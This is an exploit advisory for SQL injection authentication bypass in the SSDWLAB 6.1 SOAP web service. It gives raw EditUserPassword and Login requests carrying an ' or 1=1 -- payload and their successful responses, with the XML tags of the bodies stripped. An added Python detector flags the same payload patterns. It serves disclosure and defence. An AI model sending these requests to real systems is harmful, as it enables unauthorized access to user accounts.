SSDWLAB 6.1 – Authentication Bypass

– Exploit Details

# Exploit Title: SSDWLAB 6.1 - Authentication Bypass
# Date: 2019-10-01
# Exploit Author: Luis Buendía (exoticpayloads)
# Vendor Homepage: //www.sbpsoftware.com/
# Version: 6.1
# Tested on: IIS 7.5
# CVE : Pending
# Description: By injecting into the EditUserPassword SOAP function, it is possible to create a "fake" user and authenticate with it.

Request to the EditUserPassword Function

POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
Host: XXXXXXX.com
Content-Type: text/xml; charset=utf-8
Content-Length: 462
SOAPAction: "//tempuri.org/EditUserPassword"



  
    
      ' or 1=1 --
      string
      string
      ENG
    
  




Example of Response when injection is successful

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
X-AspNet-Version: 4.0.30319
X-Powered-By: XXX.XXX
Content-Length: 421

0



Request to Login After Successful Request

POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
Host: XXXXXXX.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: //XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[DYNAMIC]/2
Content-Type: text/xml; charset=utf-8
SOAPAction: "//tempuri.org/Login"
Content-Length: 406


  
    
      ' or 1=1 --
      string
      ENG
    
  




Example of successful login

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Powered-By: XXX.XXX
Connection: close
Content-Length: 422

0d62cc3c0b2e3413cb8b4a85b0fa6177b
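
Detection logic for the two requests above, added here as an example and not part of the original advisory: it flags SOAP calls to EditUserPassword or Login whose parameter values carry SQL injection markers. The element names param1..param3 and the sample bodies are constructed placeholders, because the service's real XML element names are not shown on this page.

```python
import re
import xml.etree.ElementTree as ET

# SOAP operations named on this page; compared on the last path segment of SOAPAction.
WATCHED_ACTIONS = {"EditUserPassword", "Login"}

# Heuristics for SQL metacharacters in a credential field: a quote followed by a
# boolean operator, a tautology such as 1=1, or a trailing SQL comment marker.
SQLI_PATTERNS = [
    re.compile(r"'\s*(or|and)\b", re.I),
    re.compile(r"\b(\d+)\s*=\s*\1\b"),
    re.compile(r"(--|/\*)\s*$"),
]

def action_name(soap_action):
    """Return the operation name from a SOAPAction header value."""
    return soap_action.strip().strip('"').rstrip("/").rsplit("/", 1)[-1]

def flag_soap_request(soap_action, body):
    """Return [(element, value, hits)] for leaf values that look like SQL injection."""
    if action_name(soap_action) not in WATCHED_ACTIONS:
        return []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return [("<unparseable body>", "", 0)]  # malformed XML is itself worth a look
    findings = []
    for elem in root.iter():
        text = (elem.text or "").strip()
        if len(elem) or not text:      # only leaf elements carry parameter values
            continue
        hits = sum(1 for p in SQLI_PATTERNS if p.search(text))
        if hits:
            name = elem.tag.rsplit("}", 1)[-1]   # drop the namespace prefix
            findings.append((name, text, hits))
    return findings

# Constructed sample bodies; param1..param3 are placeholder element names.
ENVELOPE = (
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soap:Body><Login><param1>{}</param1><param2>string</param2>"
    "<param3>ENG</param3></Login></soap:Body></soap:Envelope>"
)
SUSPICIOUS = ENVELOPE.format("' or 1=1 --")
BENIGN = ENVELOPE.format("jsmith")

if __name__ == "__main__":
    for label, body in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, flag_soap_request('"//tempuri.org/Login"', body))
```

The patterns are heuristics for triage of logged request bodies; the fix on the server side is to bind these values as query parameters instead of concatenating them into SQL.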
            
